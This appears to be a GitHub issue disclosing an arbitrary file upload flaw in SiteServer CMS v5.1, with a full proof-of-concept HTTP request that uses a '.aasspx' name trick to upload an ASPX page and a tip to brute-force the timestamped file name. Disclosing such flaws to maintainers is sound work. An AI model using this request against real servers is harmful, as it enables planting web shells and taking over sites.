Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.
By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.
Already on GitHub? Sign in to your account
测试的版本:https://github.com/siteserver/cms/releases/download/siteserver-dev-v5.0.92/siteserver_install.zip SiteServer:v5.1 测试环境:windows 2012 R2 数据库 sql server 2016 漏洞url:/api/stl/actions/upload/1?type=GovPublicApply (测试过程中,不需要修改程序任何系统配置)
包体 `POST /api/stl/actions/upload/1?type=GovPublicApply HTTP/1.1 Host: 192.168.39.3:8099 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:92.0) Gecko/20100101 Firefox/92.0 Accept: / Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 Accept-Encoding: gzip, deflate X_Requested_With: XMLHttpRequest Content-Type: multipart/form-data; boundary=---------------------------307288271314916491681521187278 Content-Length: 903 Origin: http://192.168.39.3:8099 Connection: close
-----------------------------307288271314916491681521187278 Content-Disposition: form-data; name="id"
WU_FILE_0 -----------------------------307288271314916491681521187278 Content-Disposition: form-data; name="name"
111.png -----------------------------307288271314916491681521187278 Content-Disposition: form-data; name="type"
image/png -----------------------------307288271314916491681521187278 Content-Disposition: form-data; name="lastModifiedDate"
2021/10/15 上午10:47:51 -----------------------------307288271314916491681521187278 Content-Disposition: form-data; name="size"
5720 -----------------------------307288271314916491681521187278 Content-Disposition: form-data; name="upfile"; filename="111.aasspx" Content-Type: image/png
<%@ Page Language="C#"%> <% Response.Write("hello,world"); %>
-----------------------------307288271314916491681521187278--` 生成的aspx文件名是时间戳相关,黑盒测试需要通过暴力猜解可以获取到。
The text was updated successfully, but these errors were encountered:
No branches or pull requests
测试的版本:https://github.com/siteserver/cms/releases/download/siteserver-dev-v5.0.92/siteserver_install.zip
SiteServer:v5.1
测试环境:windows 2012 R2
数据库 sql server 2016
漏洞url:/api/stl/actions/upload/1?type=GovPublicApply
(测试过程中,不需要修改程序任何系统配置)
包体
`POST /api/stl/actions/upload/1?type=GovPublicApply HTTP/1.1
Host: 192.168.39.3:8099
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:92.0) Gecko/20100101 Firefox/92.0
Accept: /
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
X_Requested_With: XMLHttpRequest
Content-Type: multipart/form-data; boundary=---------------------------307288271314916491681521187278
Content-Length: 903
Origin: http://192.168.39.3:8099
Connection: close
-----------------------------307288271314916491681521187278
Content-Disposition: form-data; name="id"
WU_FILE_0
-----------------------------307288271314916491681521187278
Content-Disposition: form-data; name="name"
111.png
-----------------------------307288271314916491681521187278
Content-Disposition: form-data; name="type"
image/png
-----------------------------307288271314916491681521187278
Content-Disposition: form-data; name="lastModifiedDate"
2021/10/15 上午10:47:51
-----------------------------307288271314916491681521187278
Content-Disposition: form-data; name="size"
5720
-----------------------------307288271314916491681521187278
Content-Disposition: form-data; name="upfile"; filename="111.aasspx"
Content-Type: image/png
<%@ Page Language="C#"%>
<% Response.Write("hello,world"); %>
-----------------------------307288271314916491681521187278--`



生成的aspx文件名是时间戳相关,黑盒测试需要通过暴力猜解可以获取到。
The text was updated successfully, but these errors were encountered: